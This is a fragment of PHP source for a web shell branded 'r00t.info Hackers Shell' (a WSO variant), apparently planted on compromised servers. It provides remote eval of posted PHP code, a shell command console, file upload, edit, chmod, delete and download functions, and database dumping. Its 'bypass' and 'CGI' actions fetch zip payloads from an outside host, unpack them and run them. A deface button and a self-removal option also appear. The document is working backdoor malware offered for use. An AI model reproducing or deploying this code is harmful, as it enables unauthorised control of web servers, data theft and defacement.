style=\"'.(empty(\$_POST['p1'])?'display:none;\r\n':'').'margin-top:5px;\r\n\" class=ml1>';\r\n if(!empty(\$_POST['p1'])) { ob_start();\r\n eval(\$_POST['p1']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo '</pre></div>';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo '<h1>File manager</h1><div 
class=content>';\r\n if(isset(\$_POST['p1'])) { switch(\$_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file(\$_FILES['f']['tmp_name'], \$_FILES['f']['name'])) echo \"Can't upload file!\";\r\n break;\r\n break;\r\n case 'mkdir': if(!@mkdir(\$_POST['p2'])) echo \"Can't create new dir\";\r\n break;\r\n case 'delete': function deleteDir(\$path) { \$path = (substr(\$path,-1)=='/') ? \$path:\$path.'/';\r\n \$dh = opendir(\$path);\r\n while ( (\$item = readdir(\$dh) ) !== false) { \$item = \$path.\$item;\r\n if ( (basename(\$item) == \"..\") || (basename(\$item) == \".\") ) continue;\r\n \$type = filetype(\$item);\r\n if (\$type == \"dir\") deleteDir(\$item);\r\n else @unlink(\$item);\r\n } closedir(\$dh);\r\n rmdir(\$path);\r\n } if(is_array(@\$_POST['f'])) foreach(\$_POST['f'] as \$f) { \$f = urldecode(\$f);\r\n if(is_dir(\$f)) deleteDir(\$f);\r\n else @unlink(\$f);\r\n } break;\r\n case 'paste': if(\$_SESSION['act'] == 'copy') { function copy_paste(\$c,\$s,\$d){ if(is_dir(\$c.\$s)){ mkdir(\$d.\$s);\r\n \$h = opendir(\$c.\$s);\r\n while ((\$f = readdir(\$h)) !== false) if ((\$f != \".\") and (\$f != \"..\")) { copy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\r\n } } elseif(is_file(\$c.\$s)) { @copy(\$c.\$s, \$d.\$s);\r\n } } foreach(\$_SESSION['f'] as \$f) copy_paste(\$_SESSION['cwd'],\$f, \$GLOBALS['cwd']);\r\n } elseif(\$_SESSION['act'] == 'move') { function move_paste(\$c,\$s,\$d){ if(is_dir(\$c.\$s)){ mkdir(\$d.\$s);\r\n \$h = opendir(\$c.\$s);\r\n while ((\$f = readdir(\$h)) !== false) if ((\$f != \".\") and (\$f != \"..\")) { copy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\r\n } } elseif(is_file(\$c.\$s)) { @copy(\$c.\$s, \$d.\$s);\r\n } } foreach(\$_SESSION['f'] as \$f) @rename(\$_SESSION['cwd'].\$f, \$GLOBALS['cwd'].\$f);\r\n } unset(\$_SESSION['f']);\r\n break;\r\n default: if(!empty(\$_POST['p1']) && ((\$_POST['p1'] == 'copy')||(\$_POST['p1'] == 'move')) ) { \$_SESSION['act'] = @\$_POST['p1'];\r\n \$_SESSION['f'] = @\$_POST['f'];\r\n foreach(\$_SESSION['f'] as \$k 
=> \$f) \$_SESSION['f'][\$k] = urldecode(\$f);\r\n \$_SESSION['cwd'] = @\$_POST['c'];\r\n } break;\r\n } echo '<script>document.mf.p1.value=\"\";\r\ndocument.mf.p2.value=\"\";\r\n</script>';\r\n } \$dirContent = @scandir(isset(\$_POST['c'])?\$_POST['c']:\$GLOBALS['cwd']);\r\n if(\$dirContent === false) { echo 'Can\\'t open this folder!';\r\n return;\r\n } global \$sort;\r\n \$sort = array('name', 1);\r\n if(!empty(\$_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\\d{1})!', \$_POST['p1'], \$match)) \$sort = array(\$match[1], (int)\$match[2]);\r\n } echo '<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\'checkbox\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\'100%\\' class=\\'main\\' cellspacing=\\'0\\' cellpadding=\\'2\\'>\r\n <form name=files method=post>';\r\n echo \"<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_name_\".(\$sort[1]?0:1).\"\\\")'>Name</a></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_size_\".(\$sort[1]?0:1).\"\\\")'>Size</a></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_modify_\".(\$sort[1]?0:1).\"\\\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_perms_\".(\$sort[1]?0:1).\"\\\")'>Permissions</a></th><th>Actions</th></tr>\";\r\n \$dirs = \$files = \$links = array();\r\n \$n = count(\$dirContent);\r\n for(\$i=0;\r\n\$i<\$n;\r\n\$i++) { \$ow = @posix_getpwuid(@fileowner(\$dirContent[\$i]));\r\n \$gr = @posix_getgrgid(@filegroup(\$dirContent[\$i]));\r\n \$tmp = array('name' => \$dirContent[\$i], 'path' => \$GLOBALS['cwd'].\$dirContent[\$i], 'modify' => @date('Y-m-d H:i:s',@filemtime(\$GLOBALS['cwd'].\$dirContent[\$i])), 'perms' => viewPermsColor(\$GLOBALS['cwd'].\$dirContent[\$i]), 'size' => @filesize(\$GLOBALS['cwd'].\$dirContent[\$i]), 'owner' 
=> \$ow['name']?\$ow['name']:@fileowner(\$dirContent[\$i]), 'group' => \$gr['name']?\$gr['name']:@filegroup(\$dirContent[\$i]) );\r\n if(@is_file(\$GLOBALS['cwd'].\$dirContent[\$i])) \$files[] = array_merge(\$tmp, array('type' => 'file'));\r\n elseif(@is_link(\$GLOBALS['cwd'].\$dirContent[\$i])) \$links[] = array_merge(\$tmp, array('type' => 'link'));\r\n elseif(@is_dir(\$GLOBALS['cwd'].\$dirContent[\$i])&& (\$dirContent[\$i] != \".\")) \$dirs[] = array_merge(\$tmp, array('type' => 'dir'));\r\n } \$GLOBALS['sort'] = \$sort;\r\n function cmp(\$a, \$b) { if(\$GLOBALS['sort'][0] != 'size') return strcmp(\$a[\$GLOBALS['sort'][0]], \$b[\$GLOBALS['sort'][0]])*(\$GLOBALS['sort'][1]?1:-1);\r\n else return ((\$a['size'] < \$b['size']) ? -1 : 1)*(\$GLOBALS['sort'][1]?1:-1);\r\n } usort(\$files, \"cmp\");\r\n usort(\$dirs, \"cmp\");\r\n usort(\$links, \"cmp\");\r\n \$files = array_merge(\$dirs, \$links, \$files);\r\n \$l = 0;\r\n foreach(\$files as \$f) { echo '<tr'.(\$l?' class=l1':'').'><td><input type=checkbox name=\"f[]\" value=\"'.urlencode(\$f['name']).'\" class=chkbx></td><td><a href=# onclick=\"'.((\$f['type']=='file')?'g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'view\\')\">'.htmlspecialchars(\$f['name']):'g(\\'FilesMan\\',\\''.\$f['path'].'\\');\r\n\"><b>[ '.htmlspecialchars(\$f['name']).' ]</b>').'</a></td><td>'.((\$f['type']=='file')?viewSize(\$f['size']):\$f['type']).'</td><td>'.\$f['modify'].'</td><td>'.\$f['owner'].'/'.\$f['group'].'</td><td><a href=# onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\',\\'chmod\\')\">'.\$f['perms'] .'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'rename\\')\">R</a> <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'touch\\')\">T</a>'.((\$f['type']=='file')?' 
<a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'edit\\')\">E</a> <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'download\\')\">D</a>':'').'</td></tr>';\r\n \$l = \$l?0:1;\r\n } echo '<tr><td colspan=5>\r\n <input type=hidden name=a value=\\'FilesMan\\'>\r\n <input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n <select name=\\'p1\\'><option value=\\'copy\\'>Copy</option><option value=\\'move\\'>Move</option><option value=\\'delete\\'>Delete</option>';\r\n if(!empty(\$_SESSION['act'])&&@count(\$_SESSION['f'])){echo '<option value=\\'paste\\'>Paste</option>';\r\n } echo '</select>&nbsp;\r\n<input type=\"submit\" value=\">>\"></td><td colspan=\"2\" align=\"right\" width=\"1\"><input name=\"def\" value=\"r00t.info shell\" disabled=\"disabled\"/>&nbsp;\r\n<input type=\"submit\" value=\"Add Deface Here\" disabled=\"disabled\"></td></tr>\r\n </form></table></div>';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin(\$p) {return decbin(hexdec(\$p));\r\n}} if(!function_exists('hex2ascii')) {function hex2ascii(\$p){\$r='';\r\nfor(\$i=0;\r\n\$i<strLen(\$p);\r\n\$i+=2){\$r.=chr(hexdec(\$p[\$i].\$p[\$i+1]));\r\n}return \$r;\r\n}} if(!function_exists('ascii2hex')) {function ascii2hex(\$p){\$r='';\r\nfor(\$i=0;\r\n\$i<strlen(\$p);\r\n++\$i)\$r.= dechex(ord(\$p[\$i]));\r\nreturn strtoupper(\$r);\r\n}} if(!function_exists('full_urlencode')) {function full_urlencode(\$p){\$r='';\r\nfor(\$i=0;\r\n\$i<strlen(\$p);\r\n++\$i)\$r.= '%'.dechex(ord(\$p[\$i]));\r\nreturn strtoupper(\$r);\r\n}} if(isset(\$_POST['ajax'])) { \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\n ob_start();\r\n if(function_exists(\$_POST['p1'])) echo \$_POST['p1'](\$_POST['p2']);\r\n \$temp = 
\"document.getElementById('strOutput').style.display='';\r\ndocument.getElementById('strOutput').innerHTML='\".addcslashes(htmlspecialchars(ob_get_clean()),\"\\n\\r\\t\\\\'\\0\").\"';\r\n\\n\";\r\n echo strlen(\$temp), \"\\n\", \$temp;\r\n exit;\r\n } printHeader();\r\n echo '<h1>String conversions</h1><div class=content>';\r\n \$stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'bin2hex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', );\r\n if(empty(\$_POST['ajax'])&&!empty(\$_POST['p1'])) \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\n echo \"<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n'><select name='selectTool'>\";\r\n foreach(\$stringTools as \$k => \$v) echo \"<option value='\".htmlspecialchars(\$v).\"'>\".\$k.\"</option>\";\r\n echo \"</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 \".(\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').\"> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>\".htmlspecialchars(@\$_POST['p2']).\"</textarea></form><pre class='ml1' style='\".(empty(\$_POST['p1'])?'display:none;\r\n':'').\"margin-top:5px' id='strOutput'>\";\r\n if(!empty(\$_POST['p1'])) { if(function_exists(\$_POST['p1'])) echo htmlspecialchars(\$_POST['p1'](\$_POST['p2']));\r\n } echo\"</pre></div>\";\r\n 
printFooter();\r\n } function actionFilesTools() { if( isset(\$_POST['p1']) ) \$_POST['p1'] = urldecode(\$_POST['p1']);\r\n if(@\$_POST['p2']=='download') { if(is_file(\$_POST['p1']) && is_readable(\$_POST['p1'])) { ob_start(\"ob_gzhandler\", 4096);\r\n header(\"Content-Disposition: attachment;\r\n filename=\".basename(\$_POST['p1']));\r\n if (function_exists(\"mime_content_type\")) { \$type = @mime_content_type(\$_POST['p1']);\r\n header(\"Content-Type: \".\$type);\r\n } \$fp = @fopen(\$_POST['p1'], \"r\");\r\n if(\$fp) { while(!@feof(\$fp)) echo @fread(\$fp, 1024);\r\n fclose(\$fp);\r\n } } elseif(is_dir(\$_POST['p1']) && is_readable(\$_POST['p1'])) { } exit;\r\n } if( @\$_POST['p2'] == 'mkfile' ) { if(!file_exists(\$_POST['p1'])) { \$fp = @fopen(\$_POST['p1'], 'w');\r\n if(\$fp) { \$_POST['p2'] = \"edit\";\r\n fclose(\$fp);\r\n } } } printHeader();\r\n echo '<h1>File tools</h1><div class=content>';\r\n if( !file_exists(@\$_POST['p1']) ) { echo 'File not exists';\r\n printFooter();\r\n return;\r\n } \$uid = @posix_getpwuid(@fileowner(\$_POST['p1']));\r\n \$gid = @posix_getgrgid(@fileowner(\$_POST['p1']));\r\n echo '<span>Name:</span> '.htmlspecialchars(\$_POST['p1']).' <span>Size:</span> '.(is_file(\$_POST['p1'])?viewSize(filesize(\$_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor(\$_POST['p1']).' <span>Owner/Group:</span> '.\$uid['name'].'/'.\$gid['name'].'<br>';\r\n echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime(\$_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime(\$_POST['p1'])).' 
<span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime(\$_POST['p1'])).'<br><br>';\r\n if( empty(\$_POST['p2']) ) \$_POST['p2'] = 'view';\r\n if( is_file(\$_POST['p1']) ) \$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');\r\n else \$m = array('Chmod', 'Rename', 'Touch');\r\n foreach(\$m as \$v) echo '<a href=# onclick=\"g(null,null,null,\\''.strtolower(\$v).'\\')\">'.((strtolower(\$v)==@\$_POST['p2'])?'<b>[ '.\$v.' ]</b>':\$v).'</a> ';\r\n echo '<br><br>';\r\n switch(\$_POST['p2']) { case 'view': echo '<pre class=ml1>';\r\n \$fp = @fopen(\$_POST['p1'], 'r');\r\n if(\$fp) { while( !@feof(\$fp) ) echo htmlspecialchars(@fread(\$fp, 1024));\r\n @fclose(\$fp);\r\n } echo '</pre>';\r\n break;\r\n case 'highlight': if( is_readable(\$_POST['p1']) ) { echo '<div class=ml1 style=\"background-color: #e1e1e1;\r\ncolor:black;\r\n\">';\r\n \$code = highlight_file(\$_POST['p1'],true);\r\n echo str_replace(array('<span ','</span>'), array('<font ','</font>'),\$code).'</div>';\r\n } break;\r\n case 'chmod': if( !empty(\$_POST['p3']) ) { \$perms = 0;\r\n for(\$i=strlen(\$_POST['p3'])-1;\r\n\$i>=0;\r\n--\$i) \$perms += (int)\$_POST['p3'][\$i]*pow(8, (strlen(\$_POST['p3'])-\$i-1));\r\n if(!@chmod(\$_POST['p1'], \$perms)) echo 'Can\\'t set permissions!<br><script>document.mf.p3.value=\"\";\r\n</script>';\r\n else die('<script>g(null,null,null,null,\"\")</script>');\r\n } echo '<form onsubmit=\"g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n\"><input type=text name=chmod value=\"'.substr(sprintf('%o', fileperms(\$_POST['p1'])),-4).'\"><input type=submit value=\">>\"></form>';\r\n break;\r\n case 'edit': if( !is_writable(\$_POST['p1'])) { echo 'File isn\\'t writeable';\r\n break;\r\n } if( !empty(\$_POST['p3']) ) { @file_put_contents(\$_POST['p1'],\$_POST['p3']);\r\n echo 'Saved!<br><script>document.mf.p3.value=\"\";\r\n</script>';\r\n } echo '<form onsubmit=\"g(null,null,null,null,this.text.value);\r\nreturn 
false;\r\n\"><textarea name=text class=bigarea>';\r\n \$fp = @fopen(\$_POST['p1'], 'r');\r\n if(\$fp) { while( !@feof(\$fp) ) echo htmlspecialchars(@fread(\$fp, 1024));\r\n @fclose(\$fp);\r\n } echo '</textarea><input type=submit value=\">>\"></form>';\r\n break;\r\n case 'hexdump': \$c = @file_get_contents(\$_POST['p1']);\r\n \$n = 0;\r\n \$h = array('00000000<br>','','');\r\n \$len = strlen(\$c);\r\n for (\$i=0;\r\n \$i<\$len;\r\n ++\$i) { \$h[1] .= sprintf('%02X',ord(\$c[\$i])).' ';\r\n switch ( ord(\$c[\$i]) ) { case 0: \$h[2] .= ' ';\r\n break;\r\n case 9: \$h[2] .= ' ';\r\n break;\r\n case 10: \$h[2] .= ' ';\r\n break;\r\n case 13: \$h[2] .= ' ';\r\n break;\r\n default: \$h[2] .= \$c[\$i];\r\n break;\r\n } \$n++;\r\n if (\$n == 32) { \$n = 0;\r\n if (\$i+1 < \$len) {\$h[0] .= sprintf('%08X',\$i+1).'<br>';\r\n} \$h[1] .= '<br>';\r\n \$h[2] .= \"\\n\";\r\n } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style=\"font-weight: normal;\r\n\"><pre>'.\$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.\$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars(\$h[2]).'</pre></td></tr></table>';\r\n break;\r\n case 'rename': if( !empty(\$_POST['p3']) ) { if(!@rename(\$_POST['p1'], \$_POST['p3'])) echo 'Can\\'t rename!<br><script>document.mf.p3.value=\"\";\r\n</script>';\r\n else die('<script>g(null,null,\"'.urlencode(\$_POST['p3']).'\",null,\"\")</script>');\r\n } echo '<form onsubmit=\"g(null,null,null,null,this.name.value);\r\nreturn false;\r\n\"><input type=text name=name value=\"'.htmlspecialchars(\$_POST['p1']).'\"><input type=submit value=\">>\"></form>';\r\n break;\r\n case 'touch': if( !empty(\$_POST['p3']) ) { \$time = strtotime(\$_POST['p3']);\r\n if(\$time) { if(@touch(\$_POST['p1'],\$time,\$time)) die('<script>g(null,null,null,null,\"\")</script>');\r\n else { echo 'Fail!<script>document.mf.p3.value=\"\";\r\n</script>';\r\n } } else echo 'Bad time format!<script>document.mf.p3.value=\"\";\r\n</script>';\r\n } 
echo '<form onsubmit=\"g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n\"><input type=text name=touch value=\"'.date(\"Y-m-d H:i:s\", @filemtime(\$_POST['p1'])).'\"><input type=submit value=\">>\"></form>';\r\n break;\r\n case 'mkfile': break;\r\n } echo '</div>';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists('cpanel/cpanel.php')){ \$dizin = 'https://byr00t.co/vb/cpanel.zip';\r\n function dosya_indir(\$link,\$name=null) { \$link_info = pathinfo(\$link);\r\n \$uzanti = strtolower(\$link_info['extension']);\r\n \$file = (\$name) ? \$name.'.'.\$uzanti : \$link_info['basename'];\r\n \$curl = curl_init(\$link);\r\n \$fopen = fopen(\$file,'w');\r\n curl_setopt(\$curl, CURLOPT_HEADER,0);\r\n curl_setopt(\$curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt(\$curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt(\$curl, CURLOPT_FILE, \$fopen);\r\n curl_exec(\$curl);\r\n curl_close(\$curl);\r\n fclose(\$fopen);\r\n } dosya_indir(\$dizin, \"cpanel\");\r\n \$zip = new ZipArchive();\r\n \$file = 'cpanel.zip';\r\n \$zip->open(\$file);\r\n \$cikar = \$zip->extractTo('cpanel/');\r\n if(file_exists('cpanel.zip')){ @unlink('cpanel.zip');\r\n } if(\$cikar){ echo \"<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> \";\r\n } else{ echo '<div class=\"alert alert-danger\"><strong>Hata!</strong> Dosya indirilirken kritik bir hata olu\xc3\x85\xc5\xb8tu.</div>';\r\n } } elseif(file_exists('cpanel/cpanel.php')){ echo \"<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> \";\r\n } printFooter();\r\n } function actionConsole() { if(isset(\$_POST['ajax'])) { \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\n ob_start();\r\n echo \"document.cf.cmd.value='';\r\n\\n\";\r\n \$temp = @iconv(\$_POST['charset'], 'UTF-8', addcslashes(\"\\n\$ \".\$_POST['p1'].\"\\n\".ex(\$_POST['p1']),\"\\n\\r\\t\\\\'\\0\"));\r\n if(preg_match(\"!.*cd\\s+([^;\r\n]+)\$!\",\$_POST['p1'],\$match)) { 
if(@chdir(\$match[1])) { \$GLOBALS['cwd'] = @getcwd();\r\n echo \"document.mf.c.value='\".\$GLOBALS['cwd'].\"';\r\n\";\r\n } } echo \"document.cf.output.value+='\".\$temp.\"';\r\n\";\r\n echo \"document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n\";\r\n \$temp = ob_get_clean();\r\n echo strlen(\$temp), \"\\n\", \$temp;\r\n exit;\r\n } printHeader();\r\n echo '<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array(\"\");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push(\"\");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>';\r\n echo '<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(document.cf.cmd.value==\\'clear\\'){document.cf.output.value=\\'\\';\r\ndocument.cf.cmd.value=\\'\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n\"><select name=alias>';\r\n foreach(\$GLOBALS['aliases'] as \$n => \$v) { if(\$v == '') { echo '<optgroup label=\"-'.htmlspecialchars(\$n).'-\"></optgroup>';\r\n continue;\r\n } echo '<option value=\"'.htmlspecialchars(\$v).'\">'.\$n.'</option>';\r\n } if(empty(\$_POST['ajax'])&&!empty(\$_POST['p1'])) \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\n echo '</select><input type=button onclick=\"add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}\" value=\">>\"> <input type=checkbox name=ajax value=1 '.(\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using 
AJAX<br/><textarea class=bigarea name=output style=\"border-bottom:0;\r\n\" readonly>';\r\n if(!empty(\$_POST['p1'])) { echo htmlspecialchars(\"\$ \".\$_POST['p1'].\"\\n\".ex(\$_POST['p1']));\r\n } echo '</textarea><input type=text name=cmd style=\"border-top:0;\r\nwidth:100%;\r\n\" onkeydown=\"kp(event);\r\n\">';\r\n echo '</form></div><script>document.cf.cmd.focus();\r\n</script>';\r\n printFooter();\r\n } function actionLogout() { unset(\$_SESSION[md5(\$_SERVER['HTTP_HOST'])]);\r\n echo '\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert(\"Logout Successful\")</script>\r\n <body bgcolor=#ffffff><center><img src=\"http://r00t.info/shell-dosyalar/logo.png\"></center>\r\n <H1><center><p style=\"color: #DF0101\" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src=\"http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&amp;\r\nwidth=260&amp;\r\ncolorsche\r\nme=light&amp;\r\nshow_faces=true&amp;\r\nborder_color=\r\n%23fff&amp;\r\nstream=false&amp;\r\nheader=false&amp;\r\nheight=100\" scrolling=\"no\" \r\nframeborder=\"0\" style=\"background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n\" allowtransparency=\"true\"></iframe></center>\r\n <H3><marquee scrollamount=\"5\" scrolldelay=\"50\" width=\"100%\"><p style=\"color: #DF0101\" >Wso shell</p></marquee></H3></body>';\r\n } function actionSelfRemove() { printHeader();\r\n if(\$_POST['p1'] == 'yes') { if(@unlink(SELF_PATH)) die('Shell has been removed');\r\n else echo 'unlink error!';\r\n } echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick=\"g(null,null,\\'yes\\')\">Yes</a></div>';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists('cgi/rot.cin')){ \$dizin = 'https://byr00t.co/vb/cgi.zip';\r\n function dosya_indir(\$link,\$name=null) { \$link_info = pathinfo(\$link);\r\n \$uzanti = 
strtolower(\$link_info['extension']);\r\n \$file = (\$name) ? \$name.'.'.\$uzanti : \$link_info['basename'];\r\n \$curl = curl_init(\$link);\r\n \$fopen = fopen(\$file,'w');\r\n curl_setopt(\$curl, CURLOPT_HEADER,0);\r\n curl_setopt(\$curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt(\$curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt(\$curl, CURLOPT_FILE, \$fopen);\r\n curl_exec(\$curl);\r\n curl_close(\$curl);\r\n fclose(\$fopen);\r\n } dosya_indir(\$dizin, \"cgi\");\r\n \$zip = new ZipArchive();\r\n \$file = 'cgi.zip';\r\n \$zip->open(\$file);\r\n \$cikar = \$zip->extractTo('cgi/');\r\n if(file_exists('cgi.zip')){ @unlink('cgi.zip');\r\n } if(\$cikar){ chmod('cgi/rot.cin', 0755);\r\n echo \"<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> \";\r\n } else{ echo '<div class=\"alert alert-danger\"><strong>Hata!</strong> Dosya indirilirken kritik bir hata olu\xc3\x85\xc5\xb8tu.</div>';\r\n } } elseif(file_exists('cgi/rot.cin')){ echo \"<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> \";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var \$type;\r\n var \$link;\r\n var \$res;\r\n function DbClass(\$type) { \$this->type = \$type;\r\n } function connect(\$host, \$user, \$pass, \$dbname){ switch(\$this->type) { case 'mysql': if( \$this->link = @mysql_connect(\$host,\$user,\$pass,true) ) return true;\r\n break;\r\n case 'pgsql': \$host = explode(':', \$host);\r\n if(!\$host[1]) \$host[1]=5432;\r\n if( \$this->link = @pg_connect(\"host={\$host[0]} port={\$host[1]} user=\$user password=\$pass dbname=\$dbname\") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb(\$db) { switch(\$this->type) { case 'mysql': if (@mysql_select_db(\$db))return true;\r\n break;\r\n } return false;\r\n } function query(\$str) { switch(\$this->type) { case 'mysql': return \$this->res = @mysql_query(\$str);\r\n break;\r\n case 'pgsql': return \$this->res = @pg_query(\$this->link,\$str);\r\n break;\r\n 
} return false;\r\n } function fetch() { \$res = func_num_args()?func_get_arg(0):\$this->res;\r\n switch(\$this->type) { case 'mysql': return @mysql_fetch_assoc(\$res);\r\n break;\r\n case 'pgsql': return @pg_fetch_assoc(\$res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch(\$this->type) { case 'mysql': return \$this->res = @mysql_list_dbs(\$this->link);\r\n break;\r\n case 'pgsql': return \$this->res = \$this->query(\"SELECT datname FROM pg_database\");\r\n break;\r\n } return false;\r\n } function listTables() { switch(\$this->type) { case 'mysql': return \$this->res = \$this->query('SHOW TABLES');\r\n break;\r\n case 'pgsql': return \$this->res = \$this->query(\"select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'\");\r\n break;\r\n } return false;\r\n } function error() { switch(\$this->type) { case 'mysql': return @mysql_error(\$this->link);\r\n break;\r\n case 'pgsql': return @pg_last_error(\$this->link);\r\n break;\r\n } return false;\r\n } function setCharset(\$str) { switch(\$this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset(\$str, \$this->link);\r\n else \$this->query('SET CHARSET '.\$str);\r\n break;\r\n case 'mysql': return @pg_set_client_encoding(\$this->link, \$str);\r\n break;\r\n } return false;\r\n } function dump(\$table) { switch(\$this->type) { case 'mysql': \$res = \$this->query('SHOW CREATE TABLE `'.\$table.'`');\r\n \$create = mysql_fetch_array(\$res);\r\n echo \$create[1].\";\r\n\\n\\n\";\r\n \$this->query('SELECT * FROM `'.\$table.'`');\r\n while(\$item = \$this->fetch()) { \$columns = array();\r\n foreach(\$item as \$k=>\$v) { \$item[\$k] = \"'\".@mysql_real_escape_string(\$v).\"'\";\r\n \$columns[] = \"`\".\$k.\"`\";\r\n } echo 'INSERT INTO `'.\$table.'` ('.implode(\", \", \$columns).') VALUES ('.implode(\", \", \$item).');\r\n'.\"\\n\";\r\n } break;\r\n case 'pgsql': 
